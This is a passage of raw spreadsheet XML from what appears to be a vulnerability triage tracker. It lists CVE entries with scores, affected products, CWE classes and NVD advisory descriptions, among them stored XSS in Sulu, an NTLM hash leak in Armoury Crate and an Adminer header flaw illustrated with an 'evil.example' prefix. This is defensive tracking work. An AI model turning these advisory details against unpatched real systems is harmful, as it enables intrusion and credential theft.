r="2102"><c r="A2102" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2102" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2102" s="5" t="inlineStr"><is><t>CVE-2026-75740</t></is></c><c r="D2102" s="5" t="n"><v>5.4</v></c><c r="E2102" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2102" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2102" s="5" t="inlineStr" /><c r="H2102" s="5" t="n"><v>0.003</v></c><c r="I2102" s="5" t="inlineStr" /><c r="J2102" s="5" t="inlineStr" /><c r="K2102" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2102" s="5" t="inlineStr" /><c r="M2102" s="5" t="inlineStr" /><c r="N2102" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2102" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2102" s="5" t="inlineStr" /><c r="Q2102" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2102"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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t></is></c></row><row r="2103"><c r="A2103" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2103" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2103" s="5" t="inlineStr"><is><t>CVE-2026-75741</t></is></c><c r="D2103" s="5" t="n"><v>5.4</v></c><c r="E2103" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2103" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2103" s="5" t="inlineStr" /><c r="H2103" s="5" t="n"><v>0.003</v></c><c r="I2103" s="5" t="inlineStr" /><c r="J2103" s="5" t="inlineStr" /><c r="K2103" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2103" s="5" t="inlineStr" /><c r="M2103" s="5" t="inlineStr" /><c r="N2103" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2103" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2103" s="5" t="inlineStr" /><c r="Q2103" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2103"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t></is></c></row><row r="2104"><c r="A2104" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2104" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2104" s="5" t="inlineStr"><is><t>CVE-2026-75742</t></is></c><c r="D2104" s="5" t="n"><v>5.4</v></c><c r="E2104" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2104" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2104" s="5" t="inlineStr" /><c r="H2104" s="5" t="n"><v>0.003</v></c><c r="I2104" s="5" t="inlineStr" /><c r="J2104" s="5" t="inlineStr" /><c r="K2104" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2104" s="5" t="inlineStr" /><c r="M2104" s="5" t="inlineStr" /><c r="N2104" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2104" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2104" s="5" t="inlineStr" /><c r="Q2104" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2104"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t></is></c></row><row r="2105"><c r="A2105" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2105" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2105" s="5" t="inlineStr"><is><t>CVE-2026-79905</t></is></c><c r="D2105" s="5" t="n"><v>5.4</v></c><c r="E2105" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2105" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G2105" s="5" t="inlineStr" /><c r="H2105" s="5" t="n"><v>0.003</v></c><c r="I2105" s="5" t="inlineStr" /><c r="J2105" s="5" t="inlineStr" /><c r="K2105" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L2105" s="5" t="inlineStr" /><c r="M2105" s="5" t="inlineStr" /><c r="N2105" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2105" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2105" s="5" t="inlineStr" /><c r="Q2105" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2105" s="5" t="inlineStr"><is><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is></c><c r="S2105" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t></is></c></row><row r="2106"><c r="A2106" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2106" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2106" s="5" t="inlineStr"><is><t>CVE-2026-82396</t></is></c><c r="D2106" s="5" t="n"><v>5.4</v></c><c r="E2106" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2106" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2106" s="5" t="inlineStr" /><c r="H2106" s="5" t="n"><v>0.002</v></c><c r="I2106" s="5" t="inlineStr" /><c r="J2106" s="5" t="inlineStr" /><c r="K2106" s="5" t="inlineStr" /><c r="L2106" s="5" t="inlineStr" /><c r="M2106" s="5" t="inlineStr" /><c r="N2106" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2106" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P2106" s="5" t="inlineStr" /><c r="Q2106" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2106" s="5" t="inlineStr"><is><t>Sulu is an open-source PHP content management system based on the Symfony framework. Prior to versions 2.6.25 and 3.0.8, src/Sulu/Bundle/MediaBundle/Controller/MediaStreamController.php allows the /media/{id}/download/{slug} route and its administration variant to honor the inline query parameter for scriptable MIME types. The vulnerable stored Content-Type values include text/html, application/xhtml+xml, text/xml, and application/xml. An attacker with media upload permission can store an HTML, XHTML, or XML document and create a link using inline=1, causing the application to return the file on the Sulu origin instead of forcing Content-Disposition attachment. When an authenticated victim opens the link, attacker-controlled JavaScript can execute with the victim's Sulu-origin session and can read data or perform actions as that victim. This issue is fixed in versions 2.6.25 and 3.0.8.</t></is></c><c r="S2106" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82396</t></is></c></row><row r="2107"><c r="A2107" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2107" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2107" s="5" t="inlineStr"><is><t>CVE-2026-84330</t></is></c><c r="D2107" s="5" t="n"><v>5.4</v></c><c r="E2107" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2107" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2107" s="5" t="inlineStr" /><c r="H2107" s="5" t="n"><v>0.002</v></c><c r="I2107" s="5" t="inlineStr" /><c r="J2107" s="5" t="inlineStr" /><c r="K2107" s="5" t="inlineStr"><is><t>google:android, google:chrome</t></is></c><c r="L2107" s="5" t="inlineStr" /><c r="M2107" s="5" t="inlineStr" /><c r="N2107" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2107" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2107" s="5" t="inlineStr" /><c r="Q2107" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="R2107" s="5" t="inlineStr"><is><t>UI misrepresentation in FullScreen in Google Chrome on on Android prior to 152.0.7977.75 allowed a remote attacker to spoof address bar via a crafted HTML page. (Chromium security severity: Medium)</t></is></c><c r="S2107" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84330</t></is></c></row><row r="2108"><c r="A2108" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2108" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2108" s="5" t="inlineStr"><is><t>CVE-2026-84385</t></is></c><c r="D2108" s="5" t="n"><v>5.4</v></c><c r="E2108" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2108" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G2108" s="5" t="inlineStr" /><c r="H2108" s="5" t="n"><v>0.001</v></c><c r="I2108" s="5" t="inlineStr" /><c r="J2108" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K2108" s="5" t="inlineStr" /><c r="L2108" s="5" t="inlineStr" /><c r="M2108" s="5" t="inlineStr" /><c r="N2108" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2108" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2108" s="5" t="inlineStr" /><c r="Q2108" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R2108" s="5" t="inlineStr"><is><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is></c><c r="S2108" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t></is></c></row><row r="2109"><c r="A2109" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2109" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2109" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D2109" s="5" t="n"><v>5.4</v></c><c r="E2109" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2109" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2109" s="5" t="inlineStr" /><c r="H2109" s="5" t="n"><v>0.002</v></c><c r="I2109" s="5" t="inlineStr" /><c r="J2109" s="5" t="inlineStr" /><c r="K2109" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L2109" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M2109" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N2109" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O2109" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2109" s="5" t="inlineStr" /><c r="Q2109" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R210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S2109" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="2110"><c r="A2110" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2110" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2110" s="5" t="inlineStr"><is><t>CVE-2025-15691</t></is></c><c r="D2110" s="5" t="n"><v>5.3</v></c><c r="E2110" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2110" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2110" s="5" t="inlineStr" /><c r="H2110" s="5" t="n"><v>0.002</v></c><c r="I2110" s="5" t="inlineStr" /><c r="J2110" s="5" t="inlineStr" /><c r="K2110" s="5" t="inlineStr" /><c r="L2110" s="5" t="inlineStr" /><c r="M2110" s="5" t="inlineStr" /><c r="N2110" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2110" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2110" s="5" t="inlineStr" /><c r="Q2110" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2110" s="5" t="inlineStr"><is><t>The WPFunnels  WordPress plugin before 3.13.0 does not check whether user registration is enabled on the site before creating accounts from opt-in form submissions, relying on a value supplied in the request instead, allowing unauthenticated attackers to create WordPress user accounts even when registration is disabled.

This is an incomplete fix for CVE-2025-12353: the check added in 3.6.3 covers only one of the three registration paths.</t></is></c><c r="S2110" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-15691</t></is></c></row><row r="2111"><c r="A2111" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2111" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2111" s="5" t="inlineStr"><is><t>CVE-2026-12962</t></is></c><c r="D2111" s="5" t="n"><v>5.3</v></c><c r="E2111" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2111" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G2111" s="5" t="inlineStr" /><c r="H2111" s="5" t="n"><v>0.004</v></c><c r="I2111" s="5" t="inlineStr" /><c r="J2111" s="5" t="inlineStr" /><c r="K2111" s="5" t="inlineStr" /><c r="L2111" s="5" t="inlineStr" /><c r="M2111" s="5" t="inlineStr" /><c r="N2111" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2111" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2111" s="5" t="inlineStr" /><c r="Q2111" s="5" t="inlineStr"><is><t>CWE-942</t></is></c><c r="R2111" s="5" t="inlineStr"><is><t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="S2111" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t></is></c></row><row r="2112"><c r="A2112" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2112" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2112" s="5" t="inlineStr"><is><t>CVE-2026-14350</t></is></c><c r="D2112" s="5" t="n"><v>5.3</v></c><c r="E2112" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2112" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G2112" s="5" t="inlineStr" /><c r="H2112" s="5" t="n"><v>0.003</v></c><c r="I2112" s="5" t="inlineStr" /><c r="J2112" s="5" t="inlineStr" /><c r="K2112" s="5" t="inlineStr" /><c r="L2112" s="5" t="inlineStr" /><c r="M2112" s="5" t="inlineStr" /><c r="N2112" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2112" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2112" s="5" t="inlineStr" /><c r="Q2112" s="5" t="inlineStr"><is><t>CWE-117</t></is></c><c r="R2112" s="5" t="inlineStr"><is><t>IBM Cloud Pak for Data System 11.3.0.2 through Interim Fix 001 could allow an unauthorized user to inject data into log messages due to improper neutralization of special elements when written to log files.</t></is></c><c r="S2112" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-14350</t></is></c></row><row r="2113"><c r="A2113" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2113" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2113" s="5" t="inlineStr"><is><t>CVE-2026-15937</t></is></c><c r="D2113" s="5" t="n"><v>5.3</v></c><c r="E2113" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2113" s="5" t="inlineStr"><is><t>security@checkmk.com</t></is></c><c r="G2113" s="5" t="inlineStr" /><c r="H2113" s="5" t="n"><v>0.001</v></c><c r="I2113" s="5" t="inlineStr" /><c r="J2113" s="5" t="inlineStr" /><c r="K2113" s="5" t="inlineStr" /><c r="L2113" s="5" t="inlineStr" /><c r="M2113" s="5" t="inlineStr" /><c r="N2113" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2113" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2113" s="5" t="inlineStr" /><c r="Q2113" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="R2113" s="5" t="inlineStr"><is><t>Improper certificate validation in Checkmk &lt;2.5.0p10 allows a relay and a push agent that share the same UUID to reuse each other's mTLS certificate to authenticate against agent receiver endpoints in either direction, because the endpoints do not verify that the certificate was issued by their own root certificate.</t></is></c><c r="S2113" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15937</t></is></c></row><row r="2114"><c r="A2114" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2114" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2114" s="5" t="inlineStr"><is><t>CVE-2026-17517</t></is></c><c r="D2114" s="5" t="n"><v>5.3</v></c><c r="E2114" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2114" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2114" s="5" t="inlineStr" /><c r="H2114" s="5" t="n"><v>0.002</v></c><c r="I2114" s="5" t="inlineStr" /><c r="J2114" s="5" t="inlineStr" /><c r="K2114" s="5" t="inlineStr" /><c r="L2114" s="5" t="inlineStr" /><c r="M2114" s="5" t="inlineStr" /><c r="N2114" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2114" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2114" s="5" t="inlineStr" /><c r="Q2114" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R2114" s="5" t="inlineStr"><is><t>The Content Views  WordPress plugin before 4.5.1.2 does not check whether the user requesting a view is allowed to read the posts it returns, allowing unauthenticated attackers to obtain the title and content of non-public posts, such as draft, pending, private and scheduled posts, when a view has been configured to include them.</t></is></c><c r="S2114" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17517</t></is></c></row><row r="2115"><c r="A2115" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2115" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2115" s="5" t="inlineStr"><is><t>CVE-2026-19032</t></is></c><c r="D2115" s="5" t="n"><v>5.3</v></c><c r="E2115" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2115" s="5" t="inlineStr"><is><t>36c7be3b-2937-45df-85ea-ca7133ea542c</t></is></c><c r="G2115" s="5" t="inlineStr" /><c r="H2115" s="5" t="n"><v>0.005</v></c><c r="I2115" s="5" t="inlineStr" /><c r="J2115" s="5" t="inlineStr"><is><t>jackson-databind, fasterxml</t></is></c><c r="K2115" s="5" t="inlineStr" /><c r="L2115" s="5" t="inlineStr" /><c r="M2115" s="5" t="inlineStr" /><c r="N2115" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2115" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2115" s="5" t="inlineStr" /><c r="Q2115" s="5" t="inlineStr"><is><t>CWE-470, CWE-610</t></is></c><c r="R2115" s="5" t="inlineStr"><is><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is></c><c r="S2115" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19032</t></is></c></row><row r="2116"><c r="A2116" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2116" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2116" s="5" t="inlineStr"><is><t>CVE-2026-19614</t></is></c><c r="D2116" s="5" t="n"><v>5.3</v></c><c r="E2116" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2116" s="5" t="inlineStr"><is><t>64c5ae8f-7972-4697-86a0-7ada793ac795</t></is></c><c r="G2116" s="5" t="inlineStr" /><c r="H2116" s="5" t="n"><v>0.002</v></c><c r="I2116" s="5" t="inlineStr" /><c r="J2116" s="5" t="inlineStr" /><c r="K2116" s="5" t="inlineStr" /><c r="L2116" s="5" t="inlineStr" /><c r="M2116" s="5" t="inlineStr" /><c r="N2116" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2116" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2116" s="5" t="inlineStr" /><c r="Q2116" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="R2116" s="5" t="inlineStr"><is><t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t></is></c><c r="S2116" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t></is></c></row><row r="2117"><c r="A2117" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2117" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2117" s="5" t="inlineStr"><is><t>CVE-2026-19625</t></is></c><c r="D2117" s="5" t="n"><v>5.3</v></c><c r="E2117" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2117" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G2117" s="5" t="inlineStr" /><c r="H2117" s="5" t="n"><v>0.003</v></c><c r="I2117" s="5" t="inlineStr" /><c r="J2117" s="5" t="inlineStr" /><c r="K2117" s="5" t="inlineStr" /><c r="L2117" s="5" t="inlineStr" /><c r="M2117" s="5" t="inlineStr" /><c r="N2117" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2117" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2117" s="5" t="inlineStr" /><c r="Q2117" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R2117" s="5" t="inlineStr"><is><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is></c><c r="S2117" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t></is></c></row><row r="2118"><c r="A2118" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2118" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2118" s="5" t="inlineStr"><is><t>CVE-2026-33389</t></is></c><c r="D2118" s="5" t="n"><v>5.3</v></c><c r="E2118" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2118" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G2118" s="5" t="inlineStr" /><c r="H2118" s="5" t="n"><v>0.001</v></c><c r="I2118" s="5" t="inlineStr" /><c r="J2118" s="5" t="inlineStr" /><c r="K2118" s="5" t="inlineStr" /><c r="L2118" s="5" t="inlineStr" /><c r="M2118" s="5" t="inlineStr" /><c r="N2118" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2118" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2118" s="5" t="inlineStr" /><c r="Q2118" s="5" t="inlineStr"><is><t>CWE-671</t></is></c><c r="R2118" s="5" t="inlineStr"><is><t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t></is></c><c r="S2118" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t></is></c></row><row r="2119"><c r="A2119" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2119" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2119" s="5" t="inlineStr"><is><t>CVE-2026-33391</t></is></c><c r="D2119" s="5" t="n"><v>5.3</v></c><c r="E2119" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2119" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G2119" s="5" t="inlineStr" /><c r="H2119" s="5" t="n"><v>0.003</v></c><c r="I2119" s="5" t="inlineStr" /><c r="J2119" s="5" t="inlineStr" /><c r="K2119" s="5" t="inlineStr" /><c r="L2119" s="5" t="inlineStr" /><c r="M2119" s="5" t="inlineStr" /><c r="N2119" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2119" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2119" s="5" t="inlineStr" /><c r="Q2119" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R2119" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t></is></c><c r="S2119" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t></is></c></row><row r="2120"><c r="A2120" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2120" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2120" s="5" t="inlineStr"><is><t>CVE-2026-34959</t></is></c><c r="D2120" s="5" t="n"><v>5.3</v></c><c r="E2120" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2120" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2120" s="5" t="inlineStr" /><c r="H2120" s="5" t="n"><v>0.002</v></c><c r="I2120" s="5" t="inlineStr" /><c r="J2120" s="5" t="inlineStr" /><c r="K2120" s="5" t="inlineStr" /><c r="L2120" s="5" t="inlineStr" /><c r="M2120" s="5" t="inlineStr" /><c r="N2120" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2120" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P2120" s="5" t="inlineStr" /><c r="Q2120" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="R2120" s="5" t="inlineStr"><is><t>Adminer 4.6.0 before 5.5.0 prepends the client-supplied X-Forwarded-Prefix header to $_SERVER["REQUEST_URI"] with no trusted-proxy check and no validation of the prefix value. An attacker can supply an absolute URL (e.g. X-Forwarded-Prefix: https://evil.example) that flows into Location redirect headers, the Set-Cookie path attribute, and self-referential links. This enables an authenticated open redirect after state-changing POSTs, unauthenticated control of the session cookie path attribute, and poisoning of self-referential links; CR/LF cannot be injected, so header splitting/XSS is not possible.</t></is></c><c r="S2120" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34959</t></is></c></row><row r="2121"><c r="A2121" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2121" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2121" s="5" t="inlineStr"><is><t>CVE-2026-34967</t></is></c><c r="D2121" s="5" t="n"><v>5.3</v></c><c r="E2121" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2121" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2121" s="5" t="inlineStr" /><c r="H2121" s="5" t="n"><v>0.002</v></c><c r="I2121" s="5" t="inlineStr" /><c r="J2121" s="5" t="inlineStr" /><c r="K2121" s="5" t="inlineStr" /><c r="L2121" s="5" t="inlineStr" /><c r="M2121" s="5" t="inlineStr" /><c r="N2121" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2121" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P2121" s="5" t="inlineStr" /><c r="Q2121" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="R2121" s="5" t="inlineStr"><is><t>Adminer versions 5.3.0 through 5.4.2 with the sql-log plugin enabled contain an arbitrary file write vulnerability in the ns parameter of plugins/sql-log.php. An authenticated user can supply path traversal sequences in the ns parameter to write arbitrary .sql files with attacker-controlled content to any writable directory on the host.</t></is></c><c r="S2121" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-34967</t></is></c></row><row r="2122"><c r="A2122" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2122" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2122" s="5" t="inlineStr"><is><t>CVE-2026-47680</t></is></c><c r="D2122" s="5" t="n"><v>5.3</v></c><c r="E2122" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2122" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G2122" s="5" t="inlineStr" /><c r="H2122" s="5" t="n"><v>0.003</v></c><c r="I2122" s="5" t="inlineStr" /><c r="J2122" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K2122" s="5" t="inlineStr" /><c r="L2122" s="5" t="inlineStr" /><c r="M2122" s="5" t="inlineStr" /><c r="N2122" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2122" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2122" s="5" t="inlineStr" /><c r="Q2122" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="R2122" s="5" t="inlineStr"><is><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is></c><c r="S2122" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t></is></c></row><row r="2123"><c r="A2123" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2123" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2123" s="5" t="inlineStr"><is><t>CVE-2026-56704</t></is></c><c r="D2123" s="5" t="n"><v>5.3</v></c><c r="E2123" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2123" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2123" s="5" t="inlineStr" /><c r="H2123" s="5" t="n"><v>0.002</v></c><c r="I2123" s="5" t="inlineStr" /><c r="J2123" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K2123" s="5" t="inlineStr" /><c r="L2123" s="5" t="inlineStr" /><c r="M2123" s="5" t="inlineStr" /><c r="N2123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2123" s="5" t="inlineStr"><is><t>2026-08-25</t></is></c><c r="P2123" s="5" t="inlineStr" /><c r="Q2123" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2123" s="5" t="inlineStr"><is><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is></c><c r="S2123" s="6" 